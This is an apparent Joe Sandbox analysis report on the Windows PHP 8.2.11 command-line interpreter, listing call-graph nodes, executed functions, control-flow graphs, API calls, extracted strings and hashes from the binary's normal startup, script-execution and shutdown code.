7ff7498c2651 php_output_write 15751->15758 15759 7ff7498c2699 zend_register_bool_constant 15751->15759 15753->15743 15754->15739 15755 7ff7498c2564 _strdup 15754->15755 15755->15739 15756->15739 15757->15739 15758->15743 15759->15743 15759->15760 15760->15743 15760->15761 15761->15748 12305 7ff7498cbf00 12306 7ff7498cbf10 12305->12306 12318 7ff7498cc20c 12306->12318 12309 7ff7498cbfb5 12310 7ff7498cbf34 _RTC_Initialize 12316 7ff7498cbf97 12310->12316 12326 7ff7498cc488 InitializeSListHead 12310->12326 12317 7ff7498cbfa5 12316->12317 12327 7ff7498cc4e4 IsProcessorFeaturePresent 12316->12327 12319 7ff7498cc21d 12318->12319 12324 7ff7498cc24f 12318->12324 12320 7ff7498cc28c 12319->12320 12323 7ff7498cc222 __scrt_acquire_startup_lock 12319->12323 12321 7ff7498cc4e4 9 API calls 12320->12321 12322 7ff7498cc296 12321->12322 12323->12324 12325 7ff7498cc23f _initialize_onexit_table 12323->12325 12324->12310 12325->12324 12328 7ff7498cc50a 12327->12328 12329 7ff7498cc518 memset RtlCaptureContext RtlLookupFunctionEntry 12328->12329 12330 7ff7498cc552 RtlVirtualUnwind 12329->12330 12331 7ff7498cc58e memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12329->12331 12330->12331 12332 7ff7498cc612 12331->12332 12332->12309 13753 7ff7498c202e 13754 7ff7498c2275 php_getopt 13753->13754 13755 7ff7498c1d80 13753->13755 13754->13755 13756 7ff7498c22bc 13754->13756 13755->13754 13757 7ff7498c1d8c get_zend_version php_printf sapi_deactivate 13755->13757 13758 7ff7498c22e0 php_output_write 13756->13758 13759 7ff7498c231c 13756->13759 13791 7ff7498c23ef 13757->13791 13763 7ff7498c266f sapi_deactivate zend_ini_deactivate 13758->13763 13761 7ff7498c2321 php_win32_console_is_own 13759->13761 13768 7ff7498c232f 13759->13768 13761->13768 13763->13791 13764 7ff7498c2415 zend_destroy_file_handle 13764->13791 13765 7ff7498c23a8 13767 7ff7498c23af __acrt_iob_func 13765->13767 13785 7ff7498c23e6 13765->13785 13766 7ff7498c1060 printf 2 API calls 13770 7ff7498c2390 __acrt_iob_func fflush 13766->13770 13771 7ff7498c1010 fprintf __stdio_common_vfprintf 13767->13771 13768->13765 13768->13766 13769 7ff7498c2427 php_request_shutdown 13769->13791 13770->13765 13775 7ff7498c23c9 __acrt_iob_func fflush 13771->13775 13772 7ff7498c2438 free 13772->13791 13773 7ff7498c2779 13777 7ff7498cbc30 8 API calls 13773->13777 13774 7ff7498c244c _getpid 13774->13773 13776 7ff7498c245b __acrt_iob_func 13774->13776 13775->13785 13779 7ff7498c1010 fprintf __stdio_common_vfprintf 13776->13779 13781 7ff7498c2f39 13777->13781 13778 7ff7498c250b virtual_cwd_activate virtual_fopen 13782 7ff7498c2526 php_printf 13778->13782 13783 7ff7498c253b zend_stream_init_fp virtual_realpath 13778->13783 13786 7ff7498c2475 __acrt_iob_func fflush 13779->13786 13780 7ff7498c25c5 php_request_startup 13788 7ff7498c2651 php_output_write 13780->13788 13789 7ff7498c2699 zend_register_bool_constant 13780->13789 13782->13791 13784 7ff7498c2564 _strdup 13783->13784 13783->13785 13784->13785 13785->13778 13785->13780 13787 7ff7498c25a1 __acrt_iob_func zend_stream_init_fp 13785->13787 13786->13785 13787->13785 13788->13791 13790 7ff7498c273b zend_is_auto_global 13789->13790 13789->13791 13790->13773 13790->13791 13791->13763 13791->13764 13791->13769 13791->13772 13791->13773 13791->13774 13791->13790 14596 7ff7498c2266 atoi 14597 7ff7498c2275 php_getopt 14596->14597 14598 7ff7498c1d80 14597->14598 14599 7ff7498c22bc 14597->14599 14598->14597 14600 7ff7498c1d8c get_zend_version php_printf sapi_deactivate 14598->14600 14601 7ff7498c231c 14599->14601 14602 7ff7498c22e0 14599->14602 14634 7ff7498c23ef 14600->14634 14604 7ff7498c2321 php_win32_console_is_own 14601->14604 14606 7ff7498c232f 14601->14606 14602->14602 14605 7ff7498c22f0 php_output_write 14602->14605 14604->14606 14607 7ff7498c266f sapi_deactivate zend_ini_deactivate 14605->14607 14609 7ff7498c23a8 14606->14609 14610 7ff7498c1060 printf 2 API calls 14606->14610 14607->14634 14608 7ff7498c2415 zend_destroy_file_handle 14608->14634 14611 7ff7498c23af __acrt_iob_func 14609->14611 14628 7ff7498c23e6 14609->14628 14613 7ff7498c2390 __acrt_iob_func fflush 14610->14613 14614 7ff7498c1010 fprintf __stdio_common_vfprintf 14611->14614 14612 7ff7498c2427 php_request_shutdown 14612->14634 14613->14609 14618 7ff7498c23c9 __acrt_iob_func fflush 14614->14618 14615 7ff7498c2438 free 14615->14634 14616 7ff7498c2779 14620 7ff7498cbc30 8 API calls 14616->14620 14617 7ff7498c244c _getpid 14617->14616 14619 7ff7498c245b __acrt_iob_func 14617->14619 14618->14628 14622 7ff7498c1010 fprintf __stdio_common_vfprintf 14619->14622 14624 7ff7498c2f39 14620->14624 14621 7ff7498c250b virtual_cwd_activate virtual_fopen 14625 7ff7498c2526 php_printf 14621->14625 14626 7ff7498c253b zend_stream_init_fp virtual_realpath 14621->14626 14629 7ff7498c2475 __acrt_iob_func fflush 14622->14629 14623 7ff7498c25c5 php_request_startup 14631 7ff7498c2651 php_output_write 14623->14631 14632 7ff7498c2699 zend_register_bool_constant 14623->14632 14625->14634 14627 7ff7498c2564 _strdup 14626->14627 14626->14628 14627->14628 14628->14621 14628->14623 14630 7ff7498c25a1 __acrt_iob_func zend_stream_init_fp 14628->14630 14629->14628 14630->14628 14631->14634 14633 7ff7498c273b zend_is_auto_global 14632->14633 14632->14634 14633->14616 14633->14634 14634->14607 14634->14608 14634->14612 14634->14615 14634->14616 14634->14617 14634->14633 14634->14634 16308 7ff7498c278e open_file_for_scanning 16309 7ff7498c27a5 zend_strip 16308->16309 16312 7ff7498c23ef 16308->16312 16309->16312 16310 7ff7498c2415 zend_destroy_file_handle 16310->16312 16311 7ff7498c2427 php_request_shutdown 16311->16312 16312->16310 16312->16311 16313 7ff7498c2438 free 16312->16313 16314 7ff7498c244c _getpid 16312->16314 16329 7ff7498c266f sapi_deactivate zend_ini_deactivate 16312->16329 16330 7ff7498c273b zend_is_auto_global 16312->16330 16331 7ff7498c2779 16312->16331 16313->16312 16315 7ff7498c245b __acrt_iob_func 16314->16315 16314->16331 16317 7ff7498c1010 fprintf __stdio_common_vfprintf 16315->16317 16316 7ff7498cbc30 8 API calls 16318 7ff7498c2f39 16316->16318 16319 7ff7498c2475 __acrt_iob_func fflush 16317->16319 16320 7ff7498c24c2 16319->16320 16321 7ff7498c250b virtual_cwd_activate virtual_fopen 16320->16321 16322 7ff7498c25c5 php_request_startup 16320->16322 16326 7ff7498c25a1 __acrt_iob_func zend_stream_init_fp 16320->16326 16323 7ff7498c2526 php_printf 16321->16323 16324 7ff7498c253b zend_stream_init_fp virtual_realpath 16321->16324 16327 7ff7498c2651 php_output_write 16322->16327 16328 7ff7498c2699 zend_register_bool_constant 16322->16328 16323->16312 16324->16320 16325 7ff7498c2564 _strdup 16324->16325 16325->16320 16326->16320 16327->16312 16328->16312 16328->16330 16329->16312 16330->16312 16330->16331 16331->16316 16370 7ff7498c1f86 16371 7ff7498c1d80 16370->16371 16372 7ff7498c2275 php_getopt 16371->16372 16374 7ff7498c1d8c get_zend_version php_printf sapi_deactivate 16371->16374 16372->16371 16373 7ff7498c22bc 16372->16373 16375 7ff7498c231c 16373->16375 16376 7ff7498c22e0 16373->16376 16408 7ff7498c23ef 16374->16408 16378 7ff7498c2321 php_win32_console_is_own 16375->16378 16380 7ff7498c232f 16375->16380 16376->16376 16379 7ff7498c22f0 php_output_write 16376->16379 16378->16380 16381 7ff7498c266f sapi_deactivate zend_ini_deactivate 16379->16381 16383 7ff7498c23a8 16380->16383 16384 7ff7498c1060 printf 2 API calls 16380->16384 16381->16408 16382 7ff7498c2415 zend_destroy_file_handle 16382->16408 16385 7ff7498c23af __acrt_iob_func 16383->16385 16402 7ff7498c23e6 16383->16402 16387 7ff7498c2390 __acrt_iob_func fflush 16384->16387 16388 7ff7498c1010 fprintf __stdio_common_vfprintf 16385->16388 16386 7ff7498c2427 php_request_shutdown 16386->16408 16387->16383 16392 7ff7498c23c9 __acrt_iob_func fflush 16388->16392 16389 7ff7498c2438 free 16389->16408 16390 7ff7498c2779 16394 7ff7498cbc30 8 API calls 16390->16394 16391 7ff7498c244c _getpid 16391->16390 16393 7ff7498c245b __acrt_iob_func 16391->16393 16392->16402 16396 7ff7498c1010 fprintf __stdio_common_vfprintf 16393->16396 16398 7ff7498c2f39 16394->16398 16395 7ff7498c250b virtual_cwd_activate virtual_fopen 16399 7ff7498c2526 php_printf 16395->16399 16400 7ff7498c253b zend_stream_init_fp virtual_realpath 16395->16400 16403 7ff7498c2475 __acrt_iob_func fflush 16396->16403 16397 7ff7498c25c5 php_request_startup 16405 7ff7498c2651 php_output_write 16397->16405 16406 7ff7498c2699 zend_register_bool_constant 16397->16406 16399->16408 16401 7ff7498c2564 _strdup 16400->16401 16400->16402 16401->16402 16402->16395 16402->16397 16404 7ff7498c25a1 __acrt_iob_func zend_stream_init_fp 16402->16404 16403->16402 16404->16402 16405->16408 16407 7ff7498c273b zend_is_auto_global 16406->16407 16406->16408 16407->16390 16407->16408 16408->16381 16408->16382 16408->16386 16408->16389 16408->16390 16408->16391 16408->16407 16408->16408

                                                Executed Functions

                                                Function 00007FF7498C1B10 Relevance: 124.8, APIs: 56, Strings: 15, Instructions: 536COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 7ff7498c1b10-7ff7498c1c41 _getpid call 7ff7498ccaba 3 7ff7498c23f4-7ff7498c2406 0->3 4 7ff7498c1c47-7ff7498c1c93 php_getopt 0->4 5 7ff7498c240e-7ff7498c2413 3->5 6 7ff7498c1c95-7ff7498c1c98 4->6 7 7ff7498c1ce3-7ff7498c1d58 php_getopt 4->7 8 7ff7498c241f-7ff7498c2425 5->8 9 7ff7498c2415-7ff7498c2419 zend_destroy_file_handle 5->9 10 7ff7498c1f40-7ff7498c1f49 php_request_startup 6->10 11 7ff7498c1c9e-7ff7498c1ca1 6->11 12 7ff7498c22c3-7ff7498c22d7 7->12 13 7ff7498c1d5e-7ff7498c1d76 7->13 17 7ff7498c242f-7ff7498c2436 8->17 18 7ff7498c2427-7ff7498c2429 php_request_shutdown 8->18 9->8 15 7ff7498c266f-7ff7498c2694 sapi_deactivate zend_ini_deactivate 10->15 16 7ff7498c1f4f-7ff7498c1f81 php_print_info php_output_end_all 10->16 19 7ff7498c1ca7-7ff7498c1caa 11->19 20 7ff7498c1dfb-7ff7498c1e04 php_request_startup 11->20 21 7ff7498c22db-7ff7498c22de 12->21 14 7ff7498c1d80-7ff7498c1d86 13->14 24 7ff7498c2275-7ff7498c22b6 php_getopt 14->24 25 7ff7498c1d8c-7ff7498c1da6 14->25 15->5 16->5 29 7ff7498c2441-7ff7498c2446 17->29 30 7ff7498c2438-7ff7498c243b free 17->30 18->17 27 7ff7498c1cb0-7ff7498c1ce1 php_getopt 19->27 28 7ff7498c1dab-7ff7498c1df6 get_zend_version php_printf sapi_deactivate 19->28 20->15 26 7ff7498c1e0a-7ff7498c1e82 php_printf _zend_hash_init@@32 zend_hash_copy@@24 zend_hash_sort_ex@@32 20->26 22 7ff7498c22e0 21->22 23 7ff7498c231c-7ff7498c231f 21->23 33 7ff7498c22e7-7ff7498c22ee 22->33 34 7ff7498c2321-7ff7498c232d php_win32_console_is_own 23->34 35 7ff7498c237b 23->35 24->14 38 7ff7498c22bc-7ff7498c22c1 24->38 25->28 36 7ff7498c1e84-7ff7498c1e88 26->36 37 7ff7498c1ea7-7ff7498c1f3b zend_hash_destroy@@8 php_printf zend_llist_copy zend_llist_sort zend_llist_apply zend_llist_destroy php_printf php_output_end_all 26->37 27->6 27->7 28->5 31 7ff7498c2f15-7ff7498c2f53 call 7ff7498cbc30 29->31 32 7ff7498c244c-7ff7498c2455 _getpid 29->32 30->29 32->31 39 7ff7498c245b-7ff7498c24bd __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 32->39 33->33 40 7ff7498c22f0-7ff7498c2317 php_output_write 33->40 41 7ff7498c232f-7ff7498c2332 34->41 42 7ff7498c236c-7ff7498c2379 34->42 46 7ff7498c237f-7ff7498c2382 35->46 44 7ff7498c1e8a-7ff7498c1e98 php_printf 36->44 45 7ff7498c1e9e-7ff7498c1ea5 36->45 37->5 38->21 59 7ff7498c24c2 39->59 40->15 41->42 48 7ff7498c2334-7ff7498c2337 41->48 42->46 44->45 45->36 45->37 50 7ff7498c2384-7ff7498c23a4 call 7ff7498c1060 __acrt_iob_func fflush 46->50 51 7ff7498c23a8-7ff7498c23ad 46->51 56 7ff7498c2339-7ff7498c2340 48->56 57 7ff7498c235d-7ff7498c236a 48->57 50->51 54 7ff7498c23af-7ff7498c23e1 __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 51->54 55 7ff7498c23e6-7ff7498c23ea 51->55 54->59 61 7ff7498c24c6-7ff7498c24c9 55->61 56->57 62 7ff7498c2342-7ff7498c234f 56->62 57->46 59->61 64 7ff7498c2506-7ff7498c2509 61->64 65 7ff7498c24cb-7ff7498c24ce 61->65 62->42 66 7ff7498c2351-7ff7498c2355 62->66 68 7ff7498c250b-7ff7498c2524 virtual_cwd_activate virtual_fopen 64->68 70 7ff7498c2588-7ff7498c259a 64->70 67 7ff7498c24d0-7ff7498c24d7 65->67 65->68 66->42 69 7ff7498c2357-7ff7498c235b 66->69 67->64 73 7ff7498c24d9-7ff7498c24e6 67->73 74 7ff7498c2526-7ff7498c2536 php_printf 68->74 75 7ff7498c253b-7ff7498c2562 zend_stream_init_fp virtual_realpath 68->75 69->42 69->57 71 7ff7498c25c5-7ff7498c264f php_request_startup 70->71 72 7ff7498c259c-7ff7498c259f 70->72 79 7ff7498c2651-7ff7498c2664 php_output_write 71->79 80 7ff7498c2699-7ff7498c26f9 zend_register_bool_constant 71->80 72->71 78 7ff7498c25a1-7ff7498c25bd __acrt_iob_func zend_stream_init_fp 72->78 81 7ff7498c24f4-7ff7498c2502 73->81 82 7ff7498c24e8-7ff7498c24ec 73->82 83 7ff7498c266a 74->83 76 7ff7498c2564-7ff7498c2574 _strdup 75->76 77 7ff7498c2578-7ff7498c2586 75->77 76->77 84 7ff7498c25c1 77->84 78->84 79->83 86 7ff7498c273b-7ff7498c2773 zend_is_auto_global 80->86 87 7ff7498c26fb-7ff7498c26ff 80->87 81->64 82->81 85 7ff7498c24ee-7ff7498c24f2 82->85 83->15 84->71 85->64 85->81 88 7ff7498c23ef 86->88 89 7ff7498c2779-7ff7498c2789 86->89 87->86 90 7ff7498c2701-7ff7498c2709 87->90 88->3 89->31 91 7ff7498c2710-7ff7498c271a 90->91 92 7ff7498c2720-7ff7498c2728 91->92 92->92 93 7ff7498c272a-7ff7498c2739 call 7ff7498cc942 92->93 93->86 93->91
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: php_printf$__acrt_iob_funcphp_getoptphp_request_startup$_getpidphp_output_end_allsapi_deactivatezend_stream_init_fp$_strdup_zend_hash_init@@32fflushfprintffreeget_zend_versionphp_output_writephp_print_infophp_request_shutdownvirtual_cwd_activatevirtual_fopenvirtual_realpathzend_destroy_file_handlezend_hash_copy@@24zend_hash_destroy@@8zend_hash_sort_ex@@32zend_ini_deactivatezend_is_auto_globalzend_llist_applyzend_llist_copyzend_llist_destroyzend_llist_sortzend_register_bool_constant
                                                • String ID: [Zend Modules]$%s$15:25:31$8.2.11$Could not open input file: %s$Could not startup.$Executing for the first time...$Finished execution, repeating...$Interactive shell$PHP %s (%s) (built: %s %s) (%s)Copyright (c) The PHP Group%s$PHP_CLI_PROCESS_TITLE$Sep 26 2023$Standard input code$ZTS Visual C++ 2019 x64$[PHP Modules]
                                                • API String ID: 3507818244-273433681
                                                • Opcode ID: 2dd6b8cd20865020332e33e677d92a6217c471f526988be5374fc274d9a3640b
                                                • Instruction ID: 8578b91d9d29d8727435965ef985c708a7ece50096dc5d665f7acf6c257453a2
                                                • Opcode Fuzzy Hash: 2dd6b8cd20865020332e33e677d92a6217c471f526988be5374fc274d9a3640b
                                                • Instruction Fuzzy Hash: A152E332A08B46C5EB10BF69E8947A9B7B8FB48798F904136DA4E437A4DF3CE454C750
                                                Function 00007FF7498C3050 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 363COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 96 7ff7498c3050-7ff7498c31a5 call 7ff7498cbb30 php_win32_console_fileno_set_vt100 * 2 php_tsrm_startup tsrm_get_ls_cache __p__fmode __acrt_iob_func _fileno _setmode __acrt_iob_func _fileno _setmode __acrt_iob_func _fileno _setmode 99 7ff7498c31ae-7ff7498c31e2 php_getopt 96->99 100 7ff7498c31a9 call 7ff7498c10c0 96->100 101 7ff7498c32b3-7ff7498c330e sapi_startup 99->101 102 7ff7498c31e8-7ff7498c31fc 99->102 100->99 103 7ff7498c3310-7ff7498c331f php_ini_builder_prepend 101->103 104 7ff7498c3325-7ff7498c3345 call 7ff7498c10e0 101->104 102->99 105 7ff7498c31fe-7ff7498c3255 php_ini_builder_define 102->105 103->104 110 7ff7498c3354-7ff7498c33aa php_win32_cp_cli_do_setup php_win32_cp_get_orig GetCommandLineW CommandLineToArgvW malloc 104->110 111 7ff7498c3347-7ff7498c334f 104->111 105->99 112 7ff7498c33e7-7ff7498c3409 SetConsoleCtrlHandler 110->112 113 7ff7498c33ac-7ff7498c33b4 110->113 114 7ff7498c34c4-7ff7498c34c7 111->114 116 7ff7498c341d-7ff7498c3460 __intrinsic_setjmp 112->116 117 7ff7498c340b-7ff7498c3415 112->117 113->112 115 7ff7498c33b6 113->115 118 7ff7498c34d2-7ff7498c34e0 call 7ff7498c10d0 114->118 119 7ff7498c34c9-7ff7498c34cc free 114->119 120 7ff7498c33c0-7ff7498c33e5 php_win32_cp_conv_w_to_cur 115->120 121 7ff7498c3462-7ff7498c3472 116->121 122 7ff7498c3490 116->122 117->116 128 7ff7498c34e2 php_module_shutdown 118->128 129 7ff7498c34e8-7ff7498c34eb 118->129 119->118 120->112 120->120 124 7ff7498c3482-7ff7498c348e call 7ff7498c97d0 121->124 125 7ff7498c3474 call 7ff7498c1b10 121->125 126 7ff7498c3495-7ff7498c34c0 122->126 124->126 134 7ff7498c3479-7ff7498c3480 125->134 126->114 128->129 132 7ff7498c34f3-7ff7498c3504 tsrm_shutdown php_win32_cp_cli_do_restore 129->132 133 7ff7498c34ed sapi_shutdown 129->133 136 7ff7498c3536-7ff7498c35e2 call 7ff7498cbbc0 exit 132->136 137 7ff7498c3506-7ff7498c3508 132->137 133->132 134->126 138 7ff7498c3523-7ff7498c3530 free LocalFree 137->138 139 7ff7498c350a-7ff7498c350d 137->139 138->136 141 7ff7498c3510-7ff7498c3521 free 139->141 141->138 141->141
                                                APIs
                                                Strings
                                                • html_errors=0register_argc_argv=1implicit_flush=1output_buffering=0max_execution_time=0max_input_time=-1, xrefs: 00007FF7498C3314
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func_fileno_setmodefree$php_win32_console_fileno_set_vt100$FreeLocal__p__fmodeexitphp_getoptphp_ini_builder_prependphp_module_shutdownphp_tsrm_startupphp_win32_cp_cli_do_restoresapi_shutdownsapi_startuptsrm_get_ls_cachetsrm_shutdown
                                                • String ID: html_errors=0register_argc_argv=1implicit_flush=1output_buffering=0max_execution_time=0max_input_time=-1
                                                • API String ID: 305676487-87643557
                                                • Opcode ID: f4cebb72dd500258a0e330d1e8e58d1e2ced59ca17baeb36faa32f8930b498ab
                                                • Instruction ID: 5a0dbdeca6a05e4626ee4e6e840612214593162d544f7b5ebe6b4844671c7c19
                                                • Opcode Fuzzy Hash: f4cebb72dd500258a0e330d1e8e58d1e2ced59ca17baeb36faa32f8930b498ab
                                                • Instruction Fuzzy Hash: 0BE10A32A0DB42CAEB11BF29E854269B7B8FB88B94F944135DA4E43764DF3CE465C710
                                                Function 00007FF7498C28D1 Relevance: 59.7, APIs: 27, Strings: 7, Instructions: 229COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 144 7ff7498c28d1-7ff7498c28db 145 7ff7498c28dd-7ff7498c28e0 144->145 146 7ff7498c28fb-7ff7498c2907 call 7ff7498c1900 144->146 145->146 148 7ff7498c28e2-7ff7498c28ea 145->148 152 7ff7498c2909-7ff7498c2918 zend_eval_string_ex 146->152 153 7ff7498c291e-7ff7498c2939 146->153 150 7ff7498c28f7 148->150 151 7ff7498c28ec-7ff7498c28ef 148->151 150->146 151->150 154 7ff7498c28f1 _efree@@8 151->154 152->153 155 7ff7498c2b12-7ff7498c2b19 153->155 156 7ff7498c293f 153->156 154->150 157 7ff7498c2b1f-7ff7498c2b34 zend_eval_string_ex 155->157 158 7ff7498c23f4-7ff7498c2406 155->158 159 7ff7498c2940-7ff7498c295b _php_stream_get_line 156->159 157->158 161 7ff7498c240e-7ff7498c2413 158->161 159->155 160 7ff7498c2961-7ff7498c2968 159->160 162 7ff7498c2970-7ff7498c2977 160->162 163 7ff7498c241f-7ff7498c2425 161->163 164 7ff7498c2415-7ff7498c2419 zend_destroy_file_handle 161->164 162->162 165 7ff7498c2979-7ff7498c297c 162->165 166 7ff7498c242f-7ff7498c2436 163->166 167 7ff7498c2427-7ff7498c2429 php_request_shutdown 163->167 164->163 168 7ff7498c2999-7ff7498c2a5b _emalloc@@8 memmove zend_hash_str_update@@32 * 2 165->168 169 7ff7498c297e 165->169 170 7ff7498c2441-7ff7498c2446 166->170 171 7ff7498c2438-7ff7498c243b free 166->171 167->166 175 7ff7498c2a74-7ff7498c2a77 168->175 176 7ff7498c2a5d-7ff7498c2a72 zend_eval_string_ex 168->176 174 7ff7498c2980-7ff7498c298a 169->174 172 7ff7498c2f15-7ff7498c2f53 call 7ff7498cbc30 170->172 173 7ff7498c244c-7ff7498c2455 _getpid 170->173 171->170 173->172 179 7ff7498c245b-7ff7498c24c9 __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 173->179 181 7ff7498c2990-7ff7498c2997 174->181 182 7ff7498c298c-7ff7498c298e 174->182 177 7ff7498c2a79-7ff7498c2a8c virtual_fopen 175->177 178 7ff7498c2aed-7ff7498c2b0c _efree@@8 175->178 176->178 183 7ff7498c2ab9-7ff7498c2ae7 zend_stream_init_fp php_execute_script 177->183 184 7ff7498c2a8e-7ff7498c2ab7 php_printf 177->184 178->155 178->159 190 7ff7498c2506-7ff7498c2509 179->190 191 7ff7498c24cb-7ff7498c24ce 179->191 181->168 181->174 182->168 182->181 183->178 184->178 193 7ff7498c250b-7ff7498c2524 virtual_cwd_activate virtual_fopen 190->193 194 7ff7498c2588-7ff7498c259a 190->194 192 7ff7498c24d0-7ff7498c24d7 191->192 191->193 192->190 197 7ff7498c24d9-7ff7498c24e6 192->197 198 7ff7498c2526-7ff7498c2536 php_printf 193->198 199 7ff7498c253b-7ff7498c2562 zend_stream_init_fp virtual_realpath 193->199 195 7ff7498c25c5-7ff7498c264f php_request_startup 194->195 196 7ff7498c259c-7ff7498c259f 194->196 203 7ff7498c2651-7ff7498c2664 php_output_write 195->203 204 7ff7498c2699-7ff7498c26f9 zend_register_bool_constant 195->204 196->195 202 7ff7498c25a1-7ff7498c25bd __acrt_iob_func zend_stream_init_fp 196->202 205 7ff7498c24f4-7ff7498c2502 197->205 206 7ff7498c24e8-7ff7498c24ec 197->206 207 7ff7498c266a-7ff7498c2694 sapi_deactivate zend_ini_deactivate 198->207 200 7ff7498c2564-7ff7498c2574 _strdup 199->200 201 7ff7498c2578-7ff7498c2586 199->201 200->201 208 7ff7498c25c1 201->208 202->208 203->207 211 7ff7498c273b-7ff7498c2773 zend_is_auto_global 204->211 212 7ff7498c26fb-7ff7498c26ff 204->212 205->190 206->205 210 7ff7498c24ee-7ff7498c24f2 206->210 207->161 208->195 210->190 210->205 213 7ff7498c23ef 211->213 214 7ff7498c2779-7ff7498c2789 211->214 212->211 215 7ff7498c2701-7ff7498c2709 212->215 213->158 214->172 216 7ff7498c2710-7ff7498c271a 215->216 217 7ff7498c2720-7ff7498c2728 216->217 217->217 218 7ff7498c272a-7ff7498c2739 call 7ff7498cc942 217->218 218->211 218->216
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: zend_eval_string_ex$__acrt_iob_func_efree@@8php_printfvirtual_fopenzend_hash_str_update@@32$_emalloc@@8_getpid_php_stream_get_linefflushfprintffreememmovephp_execute_scriptphp_request_shutdownsapi_deactivatevirtual_cwd_activatezend_destroy_file_handlezend_ini_deactivatezend_stream_init_fp
                                                • String ID: Command line begin code$Command line end code$Command line run code$Could not open input file: %s$Finished execution, repeating...$argi$argn
                                                • API String ID: 1245382911-2716470631
                                                • Opcode ID: a3b7ee3bf8614664bf83c142438161779f3922f9901a73c0d7b3d89e86b64090
                                                • Instruction ID: 38f4b08db1694bf692416bde49256cb8768fffafa7819d3042ac043eab1dff7c
                                                • Opcode Fuzzy Hash: a3b7ee3bf8614664bf83c142438161779f3922f9901a73c0d7b3d89e86b64090
                                                • Instruction Fuzzy Hash: E7C12726A0DB42C6EB14FF29E4442B9A7B8FB48B94F944135DA4E437A4DF3CE465D320
                                                Function 00007FF7498C1FC2 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 135COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 221 7ff7498c1fc2-7ff7498c1fc6 222 7ff7498c1fc8-7ff7498c1fcb 221->222 223 7ff7498c1fe7-7ff7498c1feb 221->223 224 7ff7498c1fd1-7ff7498c1fd4 222->224 225 7ff7498c20a7-7ff7498c20b3 222->225 226 7ff7498c1ff1-7ff7498c2006 223->226 227 7ff7498c2167-7ff7498c2173 223->227 224->226 228 7ff7498c1fd6-7ff7498c1fe2 224->228 229 7ff7498c2275-7ff7498c22b6 php_getopt 225->229 226->225 226->229 227->229 228->229 231 7ff7498c1d80-7ff7498c1d86 229->231 232 7ff7498c22bc-7ff7498c22de 229->232 231->229 233 7ff7498c1d8c-7ff7498c1df6 get_zend_version php_printf sapi_deactivate 231->233 235 7ff7498c22e0 232->235 236 7ff7498c231c-7ff7498c231f 232->236 242 7ff7498c240e-7ff7498c2413 233->242 237 7ff7498c22e7-7ff7498c22ee 235->237 239 7ff7498c2321-7ff7498c232d php_win32_console_is_own 236->239 240 7ff7498c237b 236->240 237->237 241 7ff7498c22f0-7ff7498c2317 php_output_write 237->241 243 7ff7498c232f-7ff7498c2332 239->243 244 7ff7498c236c-7ff7498c2379 239->244 245 7ff7498c237f-7ff7498c2382 240->245 246 7ff7498c266f-7ff7498c2694 sapi_deactivate zend_ini_deactivate 241->246 248 7ff7498c241f-7ff7498c2425 242->248 249 7ff7498c2415-7ff7498c2419 zend_destroy_file_handle 242->249 243->244 247 7ff7498c2334-7ff7498c2337 243->247 244->245 250 7ff7498c2384-7ff7498c23a4 call 7ff7498c1060 __acrt_iob_func fflush 245->250 251 7ff7498c23a8-7ff7498c23ad 245->251 246->242 255 7ff7498c2339-7ff7498c2340 247->255 256 7ff7498c235d-7ff7498c236a 247->256 257 7ff7498c242f-7ff7498c2436 248->257 258 7ff7498c2427-7ff7498c2429 php_request_shutdown 248->258 249->248 250->251 253 7ff7498c23af-7ff7498c23e1 __acrt_iob_func call 